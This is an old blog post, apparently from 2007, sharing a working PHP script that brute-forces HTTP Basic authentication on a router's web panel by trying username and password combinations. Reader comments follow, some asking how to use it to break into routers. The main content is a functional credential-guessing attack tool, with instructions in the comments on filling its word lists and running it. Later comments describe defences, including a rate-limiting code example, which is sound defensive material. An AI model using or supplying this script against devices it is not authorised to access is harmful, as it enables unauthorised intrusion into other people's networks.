Wed, 28 Nov 2007

Hacking into my router by brute-forcing http authentication

I forgot the username and password to access the web panel of my router.
Luckily I knew some possible usernames and some patterns that I could have used to construct my password, so I just had to try all the combinations... Too much work to do manually but easily done when scripted.

Here is the PHP script that I came up with (obviously stripped of my personal stuff). It got my account in less than a second :)


DISCLAIMER: Don't use this code for anything illegal! I'm not responsible for what you do with this!

<?php
$host = '';
$port = '';
$url = '/';
$users = array();
$passes = array();
tryme($host,$url,$port);
foreach($users as $user) {
   foreach($passes as $pass) {
      tryme($host,$url,$port,$user,$pass);
   }
}

function tryme($host,$url = '/',$port = 80, $user = null,$pass =null ) {
   $result="FAIL";
   if(tryAccess($host,$url,$port, $user,$pass)) $result="SUCCESS";
   if($user && $pass) $userpass = "user $user pass $pass ";
   else $userpass = " without username & password";
   echo("Tried $userpass > $result\n");
}

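// Sends one request (with HTTP Basic credentials if given) and returns true
// unless the server answers with "401 Unauthorized".
function tryAccess($host,$url = '/',$port = 80, $user = null,$pass =null)  {
   // fsockopen() takes $errno/$errdesc by reference already; a call-time "&"
   // is a fatal error on current PHP versions
   $fp = @fsockopen ($host, $port, $errno, $errdesc);
   if (!is_resource ($fp)) {
      echo("Could not open socket to server: $errno - $errdesc\n");
      return false;
   }
   @fputs ($fp, "POST $url HTTP/1.1\r\n");
   @fputs ($fp, "Host: $host\r\n");
   @fputs ($fp, "Connection: close\r\n");
   if($user && $pass) {
      // Basic auth is just base64("user:pass") in a request header
      @fputs ($fp, "Authorization: Basic " . base64_encode ("$user:$pass") . "\r\n");
   }
   @fputs($fp,"\r\n");

   $reply = '';
   $success = true;
   while (!@feof ($fp)) {
      $line = @fgets ($fp, 1024);
      // strpos() can return 0 for a match at the start, so compare with false
      if(strpos($line,'401 Unauthorized') !== false) $success = false;
      $reply .= $line;
   }
   @fclose ($fp);
   return $success;
}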
?>

Comments

On most (if not all) routers, there's a way to reset it to factory settings though. For routers that have defense mechanisms against brute force attacks (why doesn't yours?), that's the only way to do it.

Yes, my router has a password reset functionality, but then I would need to search for my null-modem cable (because it's via a serial interface), go downstairs, connect my laptop, figure out the serial settings (I always forget them), ...
It's so much more fun to leave my laptop and lazy ass where they belong and hack a script together and learn something from it :-)

About the brute force protection, it seems like it doesn't have any, which is okay for me since it only listens on the LAN (and runs on a custom port).

I just found out there is a new version of the software which supports doing a full reset triggered by a hardware button, but then I lose all my settings (which I can restore because I have backups :-) but this would also mean my internet connection has to go down for a while ...
And my initial point - the coolness factor and the educational value - remains ;-)

Hey, sorry, I'm being a bit thick. How would you modify this to work to crack your passwords?

Please explain a little?

Thanks,
Dan

The key is filling the $users and $passes arrays (or if they are really big then change how the looping works so you don't waste your RAM).

I recently had the same sort of problem. My router is inside a sort of hole in my roof, and I forgot the password. I haven't needed to access it for any reasons lately, but it would be nice to get back in. I have NO idea what it was. So is there a way for it to just test all possible solutions but having it connect together letters from the alphabet?

Also how do you use this script?

what router do you use?

It's a little embedded box, based on the pc engines WRAP 1E-2 board, running m0n0wall. (but this trick works on any device that uses http authentication)

@ the other anonymous commenter: it's a php script. save it as a file and run it as

php filename.php

Could you tell what to change for the passes Array()? I don't fully understand PHP, but I do wanna access my router again!

Ya dude...
How do you actually use the script?

Anonymous 1: Well I don't know how you construct your passwords... whether you use a fixed string, a random one, a combination thereof etc. You obviously need to know a little php.
Anonymous 2: Run it from the php command-line. (/usr/bin/php)

The password losing cases are common when you just tend to forget your password. In the scenarios where you use the login frequently you tend to remember but when you have a break for many days you need to have it written somewhere.
Also I have realized pre-storing the password for logins is not really a good idea, as you just keep logging in because the system knows the details, but if for any reason you are required to retype it, it is a problem.
my experience with passwords.

I was wondering if a hacker or any of my assistants could use this to get into my router, I have not provided them the access due to critical information but always be concerned if I am safe with my router?

Thanks for sharing was very useful.. I run a web company and have many routers to handle.

I think you shouldn't have shared this script.. the script might reach the wrong hands.. :(

That's a bit worrying how easy it could be to hack into other people's routers. Any advice on how to make it more secure?

1) rate limiting: only allow max 4 requests in a 5 minute time span or so.
2) if you only login from one of the networks (eg the LAN), only expose the interface on the relevant subnet/port.

Most consumer routers support option 2, but not option 1.
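
The rate limiting from option 1, sketched as an added example (not part of the original post or its comments): a per-client sliding window that stops evaluating credentials once the limit is hit. The class name, the sample IP and the timeline are constructed for illustration; the code assumes PHP 8.0 or later.

```php
<?php
// Added example: sliding-window limiter placed in front of an HTTP Basic auth check.
// AuthRateLimiter and the sample data below are assumptions, not from the original post.
final class AuthRateLimiter
{
    /** @var array<string, int[]> timestamps of counted attempts per client IP */
    private array $attempts = [];

    public function __construct(
        private int $maxAttempts = 4,      // "max 4 requests"
        private int $windowSeconds = 300   // "in a 5 minute time span"
    ) {}

    /** Returns true if this attempt may proceed to the password check. */
    public function allow(string $clientIp, int $now): bool
    {
        $cutoff = $now - $this->windowSeconds;
        // Forget attempts that have aged out of the window.
        $recent = array_values(array_filter(
            $this->attempts[$clientIp] ?? [],
            fn (int $t): bool => $t > $cutoff
        ));
        if (count($recent) >= $this->maxAttempts) {
            // Over the limit: reject without looking at the credentials.
            // Rejected attempts are not recorded, so the block ends once
            // the counted attempts leave the window.
            $this->attempts[$clientIp] = $recent;
            return false;
        }
        $recent[] = $now;
        $this->attempts[$clientIp] = $recent;
        return true;
    }
}

// Constructed timeline: one LAN client sends a request every 10 seconds,
// then returns after the window has passed.
$limiter = new AuthRateLimiter();
foreach ([0, 10, 20, 30, 40, 50, 400] as $t) {
    $verdict = $limiter->allow('192.168.1.50', $t)
        ? 'check credentials'
        : '429 Too Many Requests';
    echo "t={$t}s -> {$verdict}\n";
}
```

PHP keeps no state between web requests, so behind a real login page the timestamps would have to live in a shared store rather than in an object property.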

Can you give me a step by step on how to hack into a router?
I am new at this and I would like to learn.
Thanks

Losing your password is common. I realized that storing the password for logins is not a good idea, as you just keep logging in because the system knows the details, but if for any reason you are required to retype it, this is going to be a problem.
my 2 cents about passwords lost.

for those who can't understand this...

$users = array('admin','admin2');
$passes = array('password','password2');

etc....etc...

How do you actually put this script into effect? What do I need to do with the script in order to activate it and crack the password and username?

Thank you for another important article. Where else can you get this information in a comprehensive way of writing? It took me a week, and I am looking for information.
Hi, Dieter it was so thoughtful of you to post this code snippet. I too forgot the password to my router and thanks to you, I was able to hack into it and make it working. Regards..
I just want to say your article is striking. Well with your permission allow me to grab feed to keep up to date with forthcoming post. Thanks.
This is a really good read for me. Must agree that you are one of the coolest Article I ever saw. Thanks for posting this useful information.